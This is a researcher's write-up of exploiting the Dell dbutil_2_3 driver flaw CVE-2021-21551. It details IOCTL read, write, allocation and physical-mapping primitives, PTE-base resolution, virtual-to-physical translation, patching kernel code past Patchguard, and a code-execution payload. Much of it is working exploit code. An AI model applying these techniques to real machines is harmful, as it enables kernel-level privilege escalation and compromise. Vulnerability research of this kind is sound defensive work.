A Dell: CVE-2021-21551

Earlier this month, SentinelLabs published a post disclosing multiple vulnerabilities in a Dell driver. Vulnerabilities in third-party drivers are always exciting because of all the evil stuff one can do with them and, to top it off, no memory corruption has to be exploited to get the same outcome!

The Vulnerability

The vulnerability itself is not extravagant. What makes this driver “vulnerable” is the relaxed DACL on dbutil_2_3, which isn’t bad in and of itself.

As an aside, a DACL is a discretionary access control list that contains access control entries, or ACEs. An ACE will determine whether or not a particular group or user can interact with that object. In this case, an ACE is present that allows the Everyone group to interact with dbutil_2_3.

There are several Microsoft drivers, such as afd.sys or cng.sys, that allow a user to interact with them even from within a low integrity environment. What makes this scenario dangerous is the set of functions exposed to the low-privileged user. For example, a low-privileged user should not be able to allocate kernel memory or read kernel memory. This can help facilitate a sandbox escape if the stars align. Fortunately, none of the IOCTLs provide a way to leak information on post-Meltdown builds. Shame, for sure…hehe.

Behavioral Analysis

dbutil_2_3 has multiple IOCTLs, some of which are interesting and some of which are not. The author of the SentinelLabs post mentions that IOCTL 0x9b0c1ec8 gives the ability to write to memory and uses it to modify his token’s privileges. Searching for that particular IOCTL leads to the code block at dbutil_2_3+13a2:

It’s a fairly small function, but the basic block that is relevant to what we are most interested in is shown below:

If DL is set to 0, we veer to the path on the right, which takes in the source parameter for memmove; otherwise, we veer to the left and continue down to memmove. The write IOCTL causes us to go right, leaving DL set to zero, where we control the source parameter. How does this happen, though, if no instruction inside this particular function manipulates DL in any way? We need to take a step back and work backwards to see exactly where this register is first modified. Shortly after, we see what is happening outside of ReadWritePrimitives:

There are two paths leading up to ReadWritePrimitives. If we follow the first one, we can see that EDX is set to zero, which leads us to the write IOCTL. If you remember, DL is being tested, so with critical thinking skills we can assume that if EDX is set to 1, we will have found our read primitive. We follow the second path that leads to that function and see that 1 is moved into DL for IOCTL 0x9b0c1ec4. Does the theory check out?

Perfect. IOCTLs 0x9b0c1ec4 and 0x9b0c1ec8 are responsible for crippling the System’s integrity!
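As an aside, the control codes themselves can be pulled apart. The sketch below assumes the driver's codes follow the standard Windows CTL_CODE layout (device type in bits 16-31, required access in bits 14-15, function in bits 2-13, transfer method in bits 0-1); the names IoctlFields and DecodeIoctl are mine and not from the PoC.

```cpp
#include <cassert>
#include <cstdint>

// Fields of a Windows I/O control code as packed by the CTL_CODE macro.
// Helper names here are illustrative, not part of the original PoC.
struct IoctlFields
{
    uint32_t DeviceType; // bits 16-31
    uint32_t Access;     // bits 14-15 (0 == FILE_ANY_ACCESS)
    uint32_t Function;   // bits 2-13
    uint32_t Method;     // bits 0-1   (0 == METHOD_BUFFERED)
};

// Split a raw control code into its four fields.
constexpr IoctlFields DecodeIoctl(uint32_t code)
{
    return IoctlFields{
        (code >> 16) & 0xffff,
        (code >> 14) & 0x3,
        (code >> 2) & 0xfff,
        code & 0x3
    };
}

// The read and write codes differ only in their function number.
static_assert(DecodeIoctl(0x9b0c1ec4).Function == 0x7b1, "read IOCTL");
static_assert(DecodeIoctl(0x9b0c1ec8).Function == 0x7b2, "write IOCTL");
static_assert(DecodeIoctl(0x9b0c1ec8).Access == 0, "FILE_ANY_ACCESS");
static_assert(DecodeIoctl(0x9b0c1ec8).Method == 0, "METHOD_BUFFERED");
```

If that layout assumption holds, both codes decode to METHOD_BUFFERED with FILE_ANY_ACCESS, so the control code itself asks for no particular access right on the device handle.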

So the two primitives have been identified, but what is needed to interact with them?

If you take a look at the function, you begin to see what’s happening. The first block checks whether ECX is greater than or equal to 0x18, or 24, bytes. This is the input and output size. If the sizes are below this, the IRP is completed with the error STATUS_INVALID_PARAMETER. The part of this function that matters most is below:

This takes place for both the read and write primitives. After seeing what was going on for the read, I came up with this struct, which fits all the necessary requirements and gives me exactly what I am after:

typedef struct _ARBITRARY_READ_PRIMITIVE
{
    UINT32 Ignored = 0;
    UINT32 NumberOfBytes = 0;
    UINT64 AddressToRead = 0;
    UINT64 OffsetToBeAdded = 0;
    UINT8 Data[1] = { 0 };
} ARBITRARY_READ_PRIMITIVE, * PARBITRARY_READ_PRIMITIVE;

The structure I came up with for the write primitive is just a little bit different from the read, but I achieved what I wanted:

typedef struct _ARBITRARY_WRITE_PRIMITIVE
{
    UINT64 Ignored = 0;
    UINT64 WriteWhere = 0;
    UINT64 OffsetToBeAdded = 0;
    UINT64 WriteWhat = 0;
    UINT32 NumberOfBytes = 0;
} ARBITRARY_WRITE_PRIMITIVE, * PARBITRARY_WRITE_PRIMITIVE;
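A quick layout check shows how the two structures line up with the 0x18 minimum size mentioned earlier. This is only a sketch: ReadRequest and WriteRequest are hypothetical mirrors of the structures above, rewritten with fixed-width standard types so the check compiles without the Windows headers.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical mirror of ARBITRARY_READ_PRIMITIVE.
struct ReadRequest
{
    uint32_t Ignored = 0;
    uint32_t NumberOfBytes = 0;
    uint64_t AddressToRead = 0;
    uint64_t OffsetToBeAdded = 0;
    uint8_t  Data[1] = { 0 };
};

// Hypothetical mirror of ARBITRARY_WRITE_PRIMITIVE.
struct WriteRequest
{
    uint64_t Ignored = 0;
    uint64_t WriteWhere = 0;
    uint64_t OffsetToBeAdded = 0;
    uint64_t WriteWhat = 0;
    uint32_t NumberOfBytes = 0;
};

// Minimum buffer size enforced by the driver, per the text above.
constexpr size_t kMinimumRequestSize = 0x18;

// Both requests share the same 0x18-byte header: eight leading bytes,
// the target address at 0x08 and the offset at 0x10.
static_assert(offsetof(ReadRequest, AddressToRead) == 0x08, "address at 0x08");
static_assert(offsetof(WriteRequest, WriteWhere) == 0x08, "address at 0x08");
static_assert(offsetof(ReadRequest, OffsetToBeAdded) == 0x10, "offset at 0x10");
static_assert(offsetof(WriteRequest, OffsetToBeAdded) == 0x10, "offset at 0x10");

// The payload (bytes read back, or bytes to write) starts right after it.
static_assert(offsetof(ReadRequest, Data) == kMinimumRequestSize, "data at 0x18");
static_assert(offsetof(WriteRequest, WriteWhat) == kMinimumRequestSize, "data at 0x18");
```

Seen this way, the two structures describe the same wire format: a 24-byte header followed by the data being moved, which would explain why anything shorter than 0x18 bytes is rejected.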

Can I use this to read and write some random spot in memory??

Perfect.

The read and write primitives have now been created and that’s just two IOCTLs. There are other IOCTLs within this driver — are there any more interesting ones?? As of right now, we have what we need to escalate privileges whether it’s reading the System’s token and stealing it to become System or using the write primitive to modify the privileges on your process’ token and jumping through hoops to get System privileges. Either way, you will be able to achieve privilege escalation whatever route you go. What else can be done though in the context of this driver??

Exploitation Mitigations

The bane of my existence, and of anyone who actively writes kernel exploits, is Hypervisor-Enforced Code Integrity, or HVCI. HVCI kills arbitrary code execution instantly. It also kills any attempt to execute dynamically allocated memory. The engineers over at Msft have outdone themselves at preventing arbitrary code execution! Good job, guys!

As an aside, code execution will be achieved in this post but only because of HVCI not being enabled!

After a little bit of time seeing what this driver is capable of, I came across IOCTL 0x9b0c1ec0. This is perfect because the driver allocates contiguous memory for you in non-paged pool. What does this mean for us? We can dynamically allocate writable memory without risk of red-screening the machine all thanks to Dell for exposing this functionality.

The structure I came up with to allow you to interact with this IOCTL is below:

typedef struct _ARBITRARY_KERNEL_MAPPING
{
    UINT64 Ignored = 0;
    UINT64 NumberOfBytes = 0;
    UINT64 LowestAcceptableAddress = 0;
    UINT64 HighestAcceptableAddress = 0;
    UINT64 AllocatedKernelMemory = 0;
    UINT64 ResolvedPhysicalAddress = 0;
} ARBITRARY_KERNEL_MAPPING, * PARBITRARY_KERNEL_MAPPING;

The interesting thing is the driver gives you both the virtual address and the physical address of this mapped memory. Look at Dell being the real bros (the physical address is not needed anyway for what we’re doing, or going to do for that matter).

Shortly after finding that I can map kernel memory, I found another interesting IOCTL that uses MmMapIoSpace: 0x9b0c1f44. The beauty of this is that it maps the physical address into virtual space as readable, writable, and executable! Downside: the implementation unmaps the virtual address immediately after use. The prototype is below:

PVOID MmMapIoSpace(
  PHYSICAL_ADDRESS    PhysicalAddress,
  SIZE_T              NumberOfBytes,
  MEMORY_CACHING_TYPE CacheType
);

The downside to this is that the first parameter of MmMapIoSpace requires a physical address rather than a virtual one. It used to be that you could map some arbitrary physical address, usually 0x1000, with x amount of bytes and parse that data for MZ signatures or PROC pool tags to steal tokens, or other privileged memory, in the pre-Meltdown era. Now? Not so much after the whole Spectre/Meltdown fiasco; instead, you red-screen almost immediately for attempting to read invalid memory. On builds after 1709, you’ll need to forge some type of primitive to get the physical address of a virtual address…but how? We will come back to this one shortly because it plays a key role in exploitation…

Defeating PML4 Randomization

The Page Table Entry, or PTE, holds the flags that determine the permissions of a page, such as:

  1. If it’s present.
  2. If you can read and/or write to it.
  3. The User/Supervisor bit that some of the readers may be familiar with.
  4. If it’s non-executable (the no-execute bit, called NxE in this post).

These are the ones that are important to us in regards to exploitation in my opinion.

0: kd> uf nt!MiGetPteAddress
nt!MiGetPteAddress:
fffff807`72c22060 48c1e909        shr     rcx,9
fffff807`72c22064 48b8f8ffffff7f000000 mov rax,7FFFFFFFF8h
fffff807`72c2206e 4823c8          and     rcx,rax
fffff807`72c22071 48b80000000080b2ffff mov rax,0FFFF968000000000h
fffff807`72c2207b 4803c1          add     rax,rcx
fffff807`72c2207e c3              ret

It used to be that Msft hard-coded the PTE base being moved into RAX on line 6. This meant an exploit developer could calculate the PTE address of any virtual address ahead of time, which made it incredibly easy to prepare the environment for exploitation. In recent years this is no longer viable: Msft introduced a security mitigation called PML4 Randomization, which kills that ability by randomizing the PTE base on every boot. The PTE base can still be found at runtime, either as the immediate operand at MiGetPteAddress + 0x13 or by reading MmPteBase:

0: kd> dq nt!MmPteBase l1
fffff801`5c4fa358  ffff9680`00000000

At this point, we can leverage the read primitive to read this value to be able to leak an address’ PTE. My question now is…how can I dynamically resolve MmPteBase without hardcoding offsets in a reliable and efficient manner?

MiGetPteAddress is undocumented and not exported, so I can’t resolve it with GetProcAddress. Same goes for MmPteBase. We can make a signature for it, but what if the instructions differ between Windows builds? I cross-referenced MiGetPteAddress to look at all the functions that call it (spoiler: there’s a lot).

Eventually, I found one that is not only exported but whose very first call is to MiGetPteAddress. That function is MmReturnChargesToLockPagedPool and is shown below:

0: kd> uf MmReturnChargesToLockPagedPool
nt!MmReturnChargesToLockPagedPool:
fffff801`5c0c5670 4053            push    rbx
fffff801`5c0c5672 4883ec60        sub     rsp,60h
fffff801`5c0c5676 488bc1          mov     rax,rcx
fffff801`5c0c5679 488d9aff0f0000  lea     rbx,[rdx+0FFFh]
fffff801`5c0c5680 0f57c0          xorps   xmm0,xmm0
fffff801`5c0c5683 25ff0f0000      and     eax,0FFFh
fffff801`5c0c5688 4803d8          add     rbx,rax
fffff801`5c0c568b 48c1eb0c        shr     rbx,0Ch
fffff801`5c0c568f 0f11442430      movups  xmmword ptr [rsp+30h],xmm0
fffff801`5c0c5694 0f11442440      movups  xmmword ptr [rsp+40h],xmm0
fffff801`5c0c5699 0f11442450      movups  xmmword ptr [rsp+50h],xmm0
fffff801`5c0c569e e8bdc995ff      call    nt!MiGetPteAddress (fffff801`5ba22060)

Perfect.

By resolving MmReturnChargesToLockPagedPool, following its first call to MiGetPteAddress, and then reading at offset 0x13 into MiGetPteAddress, the PTE base gets resolved. In case you are wondering, MmPteBase is referenced directly elsewhere, but none of the functions that reference it are exported, wamp wamppp. The implementation to dynamically resolve the PTE base is shown below:

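--snipped--
    // Resolve the exported function whose first call is to MiGetPteAddress.
    FARPROC MmReturnChargesToLockPagedPool = GetProcAddress(
        hModule,
        "MmReturnChargesToLockPagedPool"
    );
    if (MmReturnChargesToLockPagedPool == NULL)
    {
        return false;
    }

    // The upper 32 bits are pre-set so that OR-ing in the 32-bit
    // displacement below yields a sign-extended 64-bit value. This
    // assumes the displacement is negative (the call target sits at a
    // lower address than the call site).
    UINT64 mask = 0xffffffff00000000;
    UINT8 value = 0;
    UINT8 i = 0;
    bool bFound = false;

    // Walk the function one byte at a time until the first 0xe8
    // (call rel32) or 0xc3 (ret) byte is seen.
    do
    {
        value = *reinterpret_cast<PUINT8>(
            reinterpret_cast<PUINT8>(MmReturnChargesToLockPagedPool) + i
            );
        if (value == 0xe8)
        {
            // The four bytes after the opcode are the relative displacement.
            UINT32 offset = *reinterpret_cast<PUINT32>(
                reinterpret_cast<PUINT8>(MmReturnChargesToLockPagedPool) + i + 1
                );

            // The displacement is relative to the end of the 5-byte call.
            offset += 5;

            mask |= offset;

            bFound = true;

            break;
        }
        i++;
    } while (value != 0xc3);
--snipped--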
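To make the arithmetic behind that scan concrete, here is a minimal sketch of resolving the target of an E8 call. It is a standalone restatement of the idea rather than the PoC's code, and ResolveCallTarget is a name I made up. The worked numbers come straight from the WinDbg listing above.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Returns the absolute target of a "call rel32" (opcode 0xe8) located at
// callAddress. bytes must point at the five bytes of that instruction.
// Hypothetical helper for illustration only.
inline uint64_t ResolveCallTarget(uint64_t callAddress, const uint8_t* bytes)
{
    assert(bytes[0] == 0xe8);

    // The displacement is a signed 32-bit little-endian value
    // (a little-endian host is assumed here).
    int32_t displacement = 0;
    std::memcpy(&displacement, bytes + 1, sizeof(displacement));

    // The displacement is relative to the instruction that follows the
    // call, hence the + 5. The int64_t cast sign-extends the displacement
    // so that backward calls resolve correctly.
    return callAddress + 5 + static_cast<int64_t>(displacement);
}
```

Feeding it the call from the listing (bytes e8 bd c9 95 ff at fffff801`5c0c569e) gives fffff801`5ba22060, which is the MiGetPteAddress address WinDbg printed. The PTE base is then the 8-byte immediate at that address + 0x13.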

This is great and all, but what if I want to do more than just get the PTE of a virtual address or what if the PTE is NULL? (looking at you ntos!) There is an undocumented function that is used from within MmGetPhysicalAddress called MiFillPteHierarchy that does exactly what I want to achieve. Its implementation is MiGetPteAddress 4 times over, consecutively.

0: kd> uf nt!MiFillPteHierarchy
nt!MiFillPteHierarchy:
fffff806`1f0595d0 48c1e909        shr     rcx,9
fffff806`1f0595d4 49b9f8ffffff7f000000 mov r9,7FFFFFFFF8h
fffff806`1f0595de 4923c9          and     rcx,r9
fffff806`1f0595e1 49b8000000000083ffff mov r8,0FFFF830000000000h
fffff806`1f0595eb 498bc0          mov     rax,r8
fffff806`1f0595ee 4803c8          add     rcx,rax
fffff806`1f0595f1 48890a          mov     qword ptr [rdx],rcx
fffff806`1f0595f4 48c1e909        shr     rcx,9
fffff806`1f0595f8 4923c9          and     rcx,r9
fffff806`1f0595fb 498bc0          mov     rax,r8
fffff806`1f0595fe 4803c8          add     rcx,rax
fffff806`1f059601 48894a08        mov     qword ptr [rdx+8],rcx
fffff806`1f059605 48c1e909        shr     rcx,9
fffff806`1f059609 4923c9          and     rcx,r9
fffff806`1f05960c 498bc0          mov     rax,r8
fffff806`1f05960f 4803c8          add     rcx,rax
fffff806`1f059612 48894a10        mov     qword ptr [rdx+10h],rcx
fffff806`1f059616 48c1e909        shr     rcx,9
fffff806`1f05961a 4923c9          and     rcx,r9
fffff806`1f05961d 498bc0          mov     rax,r8
fffff806`1f059620 4803c8          add     rcx,rax
fffff806`1f059623 48894a18        mov     qword ptr [rdx+18h],rcx
fffff806`1f059627 c3              ret

When it comes down to it, I can easily implement the logic of this function to calculate all four levels.
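A minimal sketch of that logic, transcribed from the disassembly above, could look like the following. The PteHierarchy, GetEntryAddress and FillPteHierarchy names are mine, and the PTE base is passed in as a parameter because it has to be leaked at runtime.

```cpp
#include <cassert>
#include <cstdint>

// Addresses of the four paging-structure entries that map a virtual
// address, in the same order MiFillPteHierarchy stores them.
struct PteHierarchy
{
    uint64_t Pte;   // [rdx]
    uint64_t Pde;   // [rdx+8]
    uint64_t Pdpte; // [rdx+10h]
    uint64_t Pml4e; // [rdx+18h]
};

// Same constant the disassembly loads into r9.
constexpr uint64_t kEntryMask = 0x7FFFFFFFF8ULL;

// One step of the walk: shr 9, mask, add the PTE base.
// This is exactly what MiGetPteAddress does.
constexpr uint64_t GetEntryAddress(uint64_t address, uint64_t pteBase)
{
    return ((address >> 9) & kEntryMask) + pteBase;
}

// Apply the step four times; each level is the "PTE" of the one before it.
inline PteHierarchy FillPteHierarchy(uint64_t virtualAddress, uint64_t pteBase)
{
    PteHierarchy h{};
    h.Pte   = GetEntryAddress(virtualAddress, pteBase);
    h.Pde   = GetEntryAddress(h.Pte, pteBase);
    h.Pdpte = GetEntryAddress(h.Pde, pteBase);
    h.Pml4e = GetEntryAddress(h.Pdpte, pteBase);
    return h;
}
```

As a sanity check, feeding it the old fixed base 0xFFFFF68000000000 and virtual address 0 yields 0xFFFFF6FB40000000, 0xFFFFF6FB7DA00000 and 0xFFFFF6FB7DBED000 for the upper three levels, which are the constants people used to hardcode before the base was randomized.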

Sick.

There is interesting behavior when leveraging the read primitive to leak the contents of a NULL PTE. What happens is you end up reading the bytes that are located at the virtual address you are trying to read. For example, ntoskrnl does not have a PTE. If you were to try and read the PTE address calculated for ntoskrnl, you will end up reading in the MZ signature. I’m not quite sure if there is a better and more “professional” way to check against the other entries to see if it’s NULL, but this hacky, quick, and filthy implementation works perfectly:

bool DellBiosUtil::isValidPte(UINT64 Source, UINT64 Pte)
{
    UINT64 SourceContents = 0;
    UINT64 PteContents = 0;
    
    if (!Read(Source, &SourceContents))
    {
        return false;
    }

    if (!Read(Pte, &PteContents))
    {
        return false;
    }

    if (SourceContents == PteContents)
    {
        return false;
    }

    return true;
}

As an aside, I’m sure there’s a way to check if a PTE is NULL but this was the easiest way to go without going into fully-fledged programming.

If the PTE is NULL, then the PDE needs to be used instead. This is no biggie and doesn’t really alter our code at all, because the flags of the PTE and PDE map one to one, according to the Intel SDM Vol. 3c. Table 4-10.
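One plausible explanation for the behavior above, which is my assumption and not something I verified against this driver or build, is that ntoskrnl is mapped with 2 MB large pages. On x86-64, a PDE with bit 7 (PS) set maps a 2 MB page directly, so there is no page table below it and the computed "PTE address" lands in the data page itself. If that is what is going on, checking the PS bit would be a cleaner test than comparing contents. A sketch, with hypothetical helper names:

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kPresentBit          = 1ULL << 0;
constexpr uint64_t kLargePageBit        = 1ULL << 7;             // PS bit in a PDE
constexpr uint64_t kLargePageFrameMask  = 0x000FFFFFFFE00000ULL; // bits 21-51
constexpr uint64_t kLargePageOffsetMask = 0x1FFFFFULL;           // low 21 bits

// True when the PDE is present and maps a 2 MB page directly, meaning
// there is no PTE level for addresses in that range.
constexpr bool IsLargePagePde(uint64_t pdeValue)
{
    return (pdeValue & kPresentBit) != 0 && (pdeValue & kLargePageBit) != 0;
}

// Physical address for a virtual address that is mapped by a large-page
// PDE: 2 MB-aligned frame from the PDE plus the 21-bit offset from the VA.
constexpr uint64_t LargePageToPhysical(uint64_t virtualAddress, uint64_t pdeValue)
{
    return (pdeValue & kLargePageFrameMask) |
           (virtualAddress & kLargePageOffsetMask);
}
```

The only difference from the 4 KB case is the width of the offset: 21 bits taken from the virtual address instead of 12.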

Defeating Meltdown

As I mentioned before, the moment you start trying to map arbitrary memory, you will red-screen almost instantly due to the Meltdown patches. They killed the ability to scan memory for privileged information by almost instantly crashing the system. So what can one do to resolve a virtual address’s physical address in a more reliable and efficient manner?

Take a look at the structure of the PTE format based on the Intel SDM:

typedef union _PAGE_TABLE_ENTRY
{
    struct 
    {
        UINT64 Present : 1;					/// bit 0
        UINT64 ReadWrite : 1;				/// bit 1
        UINT64 UserSupervisor : 1;			/// bit 2
        UINT64 PageLevelWriteThrough : 1;	/// bit 3
        UINT64 PageLevelCacheDisable : 1;	/// bit 4
        UINT64 Accessed : 1;				/// bit 5
        UINT64 Dirty : 1;					/// bit 6
        UINT64 PAT : 1;						/// bit 7
        UINT64 Global : 1;					/// bit 8 
        UINT64 CopyOnWrite : 1;				/// bit 9
        UINT64 Ignored : 2;					/// bits 10 - 11
        UINT64 Pfn : 40;					/// bits 12 - (52 - 1)
        UINT64 Reserved : 11;				/// bits 52 - 62
        UINT64 NxE : 1;						/// bit 63
    } flags;
    UINT64 value = 0;
} PAGE_TABLE_ENTRY, * PPAGE_TABLE_ENTRY;

By reading the PTE, we can retrieve the Page Frame Number, or PFN. This is beautiful because we don’t have to rely on APIs such as MmGetPhysicalAddress or the like. A simple algorithm I came up with to calculate a virtual address’s physical address is below:

UINT64 DellBiosUtil::VirtualToPhysical(UINT64 VirtualAddress, UINT64 index)
{
    VirtualAddress &= 0xfff;
    
    return (index << 12) + VirtualAddress;
}

All this does is keep the low 12 bits of the virtual address (the page offset) and add them to the PFN shifted left by 12. Simple. Elegant. Huge impact. By using the read primitive, we created a simple virtual-to-physical address translation function, which eliminates the need to scan memory and, in turn, defeats Meltdown’s protections. With precision, I may add 😉
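For completeness, here is a small sketch of the same translation working on a raw 64-bit PTE value instead of the bitfield. The 40-bit PFN width matches the Pfn : 40 field in the union above; the helper names and the sample PTE value in the note that follows are made up for illustration.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kPfnMask        = 0xFFFFFFFFFFULL; // 40 bits, same as Pfn : 40
constexpr uint64_t kPageOffsetMask = 0xfffULL;        // low 12 bits of the VA

// Pull the page frame number (bits 12-51) out of a raw PTE value.
constexpr uint64_t PfnFromPte(uint64_t pteValue)
{
    return (pteValue >> 12) & kPfnMask;
}

// Same calculation as DellBiosUtil::VirtualToPhysical: page frame base
// plus the offset of the address within its 4 KB page.
constexpr uint64_t VirtualToPhysical(uint64_t virtualAddress, uint64_t pfn)
{
    return (pfn << 12) + (virtualAddress & kPageOffsetMask);
}
```

For example, a made-up PTE value of 0x8A00000012345863 carries PFN 0x12345, so a virtual address ending in 0x266 translates to physical address 0x12345266.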

Why go through all the work to satisfy that function if we not only have a read and write primitive, but a function that allocates writable memory for us? Two words: double mapping…

Patching without Patchguard

What if you want to write to something that isn’t writable? For instance, and this is just an example, what if you want to hook something from within ntoskrnl? If you were to write to something in there in its current state, you will red-screen specifically because of us trying to write to read-only memory.

One thing that can be done is to disable Cr0.[wp], write to it, and then re-enable Cr0.[wp]. I, personally, think that is pretty dirty (and I’m always down for dirty), and it can open you up to potential red-screens. One must hope that Patchguard doesn’t catch the modification at the time it is made, because the machine will red-screen if it does. The better way is to resolve the virtual address’ physical address by reading the virtual address’ PTE and then calculating its physical address using the PFN and the offset of that function. Doing it this way eliminates the need to modify the control register and avoids potentially triggering a red-screen due to Patchguard.

Caveat: the area of memory you are overwriting needs to be deemed not critical for Patchguard not to get triggered.

The structure to interact with this IOCTL is below:

typedef struct _ARBITRARY_DOUBLE_MAPPING
{
    UINT64 Ignored = 0;
    UINT64 PhysicalAddress = 0x1000;
    UINT8 Data[1024] = { 0 };
} ARBITRARY_DOUBLE_MAPPING, * PARBITRARY_DOUBLE_MAPPING;

I am going to place a breakpoint right after the memcpy to confirm that I do overwrite the MZ signature of ntoskrnl without modifying Cr0.[wp].

Perfect.

So how does this work? This works because MmMapIoSpace maps the physical address of ntoskrnl into virtual space as read/write/execute, essentially re-mapping the same memory with full read/write permissions. The moment you write to the mapped virtual address, the change is visible instantaneously. The driver’s implementation then unmaps this space immediately after use, so the mapping is not usable afterwards.

Sick.

Code Execution

All the necessary ingredients are here to make the perfect exploit:

  1. Allocate memory and write to it if needed.
  2. A read primitive.
  3. A write primitive.
  4. Ability to change the permissions of a page.
  5. Ability to write to read-only memory.

The game plan now is to find a sweet spot within dbutil_2_3 and patch it to contain my code so that I can just trigger it with an IOCTL. dbutil_2_3 isn’t deemed critical, so patching the driver itself will not cause any issues with Patchguard. The function I chose leads to a KeInsertQueueDpc call, and since I am not interested in using that particular function, it is a prime candidate. The function is shown below:

The function begins at dbutil_2_3 + 0x1266 and ends at dbutil_2_3 + 0x12b5. This gives me one byte shy of 80 bytes which is more than enough to accomplish anything really and if 80 bytes isn’t enough, extending it is fairly simple to have more space.

The payload will be something simple to demonstrate the overwrite and that is shown below:

const int szSize = 79;

PBYTE patched = new BYTE[szSize];
RtlFillMemory(patched, szSize, 0x90);
RtlFillMemory(patched, 1, 0xcc);

After a successful run, you can see that by reading the PTE of dbutil_2_3 + 0x1266 and leaking its physical address, we can use that to map its physical page into virtual space and write to it with the modified instruction set as shown below:

This is great because now we can execute anything we want. The only limitation is what you can think of! All that is left to do is trigger this path by using IOCTL 0x9b0c1f04.

Perfect.

As of now, the PoC will red-screen the machine because we have completely ruined what the driver is expecting. So how would you go about fixing that? The code blocks below are what comes after that call (I got rid of the junk and am only showing the direct path from the end of that code block to the end of the function for clarity’s sake):

The most efficient way is to jump to an area that is safe. The code blocks leading to the end of that function all dereference some register either from RSP or RDI. The top three code blocks are not ideal because those registers can, and will, get clobbered once you start introducing meaningful assembly and not just executing a whole bunch of NOPs. The area that is ideal to jump to would be the last function. The IRP will then get passed to IofCompleteRequest and the function will complete with no bugchecks 🙂

The updated code to accomplish this is below:

UINT8 JmpStub[] = {
    0xe9, 0x06, 0x02, 0x00, 0x00
};

const int szSize = 85 + sizeof(JmpStub);

PBYTE patched = new BYTE[szSize];

RtlFillMemory(patched, szSize, 0x90);
RtlFillMemory(patched, 1, 0xcc);

RtlCopyMemory(patched + szSize - sizeof(JmpStub), JmpStub, sizeof(JmpStub));
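The five bytes in JmpStub are a near jmp (opcode 0xe9) followed by a 32-bit little-endian displacement, which is measured from the end of the jmp instruction. The sketch below shows how such a stub can be derived from a source and a destination address; EncodeJmpRel32 is a hypothetical helper and not part of the PoC.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

// Builds "jmp rel32" for a jump located at `from` that should land on `to`.
// Both values may be absolute addresses or offsets into the same module.
// Hypothetical helper for illustration only.
inline std::array<uint8_t, 5> EncodeJmpRel32(uint64_t from, uint64_t to)
{
    // The displacement is relative to the instruction after the 5-byte jmp.
    const uint32_t displacement = static_cast<uint32_t>(to - (from + 5));

    return {{
        0xe9,
        static_cast<uint8_t>(displacement & 0xff),
        static_cast<uint8_t>((displacement >> 8) & 0xff),
        static_cast<uint8_t>((displacement >> 16) & 0xff),
        static_cast<uint8_t>((displacement >> 24) & 0xff)
    }};
}
```

Assuming the patch is written starting at dbutil_2_3 + 0x1266, the stub sits 85 bytes in, at offset 0x12bb. A displacement of 0x206 then puts the landing spot at 0x12bb + 5 + 0x206 = 0x14c6, and EncodeJmpRel32(0x12bb, 0x14c6) reproduces the bytes e9 06 02 00 00 used above.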

It is mentioned that a memory corruption exists within the driver as well but since we have constructed pretty strong primitives, there is absolutely no need to exploit a memory corruption with the potential to disrupt the machine if not extremely cautious. After all, we don’t want to raise any red flags if we’re casting spells now do we?? hehe…

Root Cause

The underlying issue is the relaxed DACL dbutil_2_3 has that allows for even a low integrity user to interact with it; however, there is no way for a low integrity user to somehow leak the necessary information to exploit this without the need of a separate vulnerability that utilizes an information disclosure or a memory leak. The only thing a low integrity user would be able to do is crash the system.

Another gotcha is the driver needs to be running for the user to be able to interact with it. From the sounds of it, it looks like the driver will only get registered and started during the update itself and then deleted once it is done updating whatever it is updating. Successful exploitation would need to happen during that time frame. If the driver is on your system but the service is not running, you will not be able to take advantage of this driver. If the service is running, then that’s a different story.

To sum things up, I used five IOCTLs to do pretty hefty damage; one of which allocates writable kernel memory which can be used to easily convert a NxE page into an executable page. I used the read primitive to read the contents of dbutil_2_3’s PTE to calculate the physical address of the target function I wanted to overwrite. I then used MmMapIoSpace to double map dbutil_2_3’s physical address as writable to be able to write instantaneously to it. Lastly, I used the IOCTL that was responsible for queuing DPC threads to trigger arbitrary code execution. If HVCI is enabled, the system will be protected from this type of attack; however, it will not protect you from overwriting anything with the write primitive or reading anything inside kernel memory!

There you have it! Arbitrary code execution.

Nice.

As an aside, everything was tested on Windows Enterprise 20h2 and not on anything else!

You can find the PoC for this instance on Github: https://github.com/ch3rn0byl/CVE-2021-21551
